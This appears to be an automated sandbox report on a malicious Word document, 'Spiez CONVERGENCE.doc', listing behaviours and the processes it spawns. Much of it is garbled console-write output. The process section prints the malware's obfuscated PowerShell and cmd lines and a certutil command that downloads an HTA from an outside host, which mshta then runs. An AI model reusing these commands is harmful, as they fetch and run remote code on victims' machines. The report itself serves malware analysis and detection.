Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...>.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...Y.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...".....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D...J.............................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D...e.....................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.......Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..2.....x...........X?......A.Gux...............a.Gu..0.............D.................................2.\.....Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................\...A.Gu................a.Gu..0.............D.........................................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........x.......+... .......A.Gux...............a.Gu..0.............D.......................+.......X.........Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................+.......\...A.Gu................a.Gu..0.............D.......................+.................Fu........	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U......3.i..../........3.i......}.L\|.iH.....-l$(.i..-l..K;L\|.i.............7.i4......i..}...>.......U.....$(.i...i....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.../.....>.....A.Gu8...............a.Gu..0...................................../.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...;.....>.....A.Gu................a.Gu..0.....................................;.........U.\.....Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...;.....>.....A.Gu8...............a.Gu..0.....................................;.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............\...G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.2.8.0.................B...................G...........".....Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...G.....>.....A.Gu8...............a.Gu..0................._...................G.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...S.....>.....A.Gu................a.Gu..0.....................................S.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...S.....>.....A.Gu8...............a.Gu..0.....................................S.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\..._.....>.....A.Gu................a.Gu..0....................................._.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\..._.....>.....A.Gu8...............a.Gu..0....................................._.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...k.....>.....A.Gu................a.Gu..0.....................................k.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...k.....>.....A.Gu8...............a.Gu..0.................(...................k.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...w.....>.....A.Gu................a.Gu..0.................P...................w.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...w.....>.....A.Gu8...............a.Gu..0.................k...................w.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................9.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................a.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................\|.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................+.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................F.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................n.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................9.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................T.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................\|.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...+.....>.....A.Gu................a.Gu..0.................E...................+.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...+.....>.....A.Gu8...............a.Gu..0.................`...................+.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...7.....>.....A.Gu................a.Gu..0.....................................7.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...7.....>.....A.Gu8...............a.Gu..0.....................................7.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...C.....>.....A.Gu................a.Gu..0.....................................C.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...C.....>.....A.Gu8...............a.Gu..0.....................................C.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...O.....>.....A.Gu................a.Gu..0.....................................O.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...O.....>.....A.Gu8...............a.Gu..0.................)...................O.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...[.....>.....A.Gu................a.Gu..0.................Q...................[.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...[.....>.....A.Gu8...............a.Gu..0.................l...................[.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...g.....>.....A.Gu................a.Gu..0.....................................g.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...g.....>.....A.Gu8...............a.Gu..0.....................................g.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...s.....>.....A.Gu................a.Gu..0.....................................s.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...s.....>.....A.Gu8...............a.Gu..0.....................................s.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................5.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................].............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................x.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................&.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................A.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................i.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................3.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................N.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................v.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................?.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................Z.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...'.....>.....A.Gu................a.Gu..0.....................................'.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...'.....>.....A.Gu8...............a.Gu..0.....................................'.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...3.....>.....A.Gu................a.Gu..0.....................................3.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...3.....>.....A.Gu8...............a.Gu..0.................#...................3.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...?.....>.....A.Gu................a.Gu..0.................K...................?.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...?.....>.....A.Gu8...............a.Gu..0.................f...................?.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...K.....>.....A.Gu................a.Gu..0.....................................K.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...K.....>.....A.Gu8...............a.Gu..0.....................................K.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...W.....>.....A.Gu................a.Gu..0.....................................W.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...W.....>.....A.Gu8...............a.Gu..0.....................................W.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...c.....>.....A.Gu................a.Gu..0.....................................c.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...c.....>.....A.Gu8...............a.Gu..0.................2...................c.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...o.....>.....A.Gu................a.Gu..0.................Z...................o.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...o.....>.....A.Gu8...............a.Gu..0.................u...................o.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\...{.....>.....A.Gu................a.Gu..0.....................................{.........U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...{.....>.....A.Gu8...............a.Gu..0.....................................{.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................#.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................>.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................f.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0................./.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................J.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................w.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0.................A.............................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................\.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.......Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.......................................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ..U.........\.........>.....A.Gu................a.Gu..0...............................................U.\.....Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\.........>.....A.Gu8...............a.Gu..0.................%.....................................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ............\...#... .>.....A.Gu................a.Gu..0.................M...................#.................Fu........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........8...\...#.....>.....A.Gu8...............a.Gu..0.................h...................#.................Fu........

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: Spiez CONVERGENCE.doc

virustotal: Detection: 52%

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\Spiez CONVERGENCE.doc
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' eChO ieX (gCi ENv:STi).VALUe '
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN -
Source: unknown	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.hta'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ecHo IEX (GI enV:Kjv).valUe '
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -
Source: unknown	Process created: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516
Source: unknown	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1516
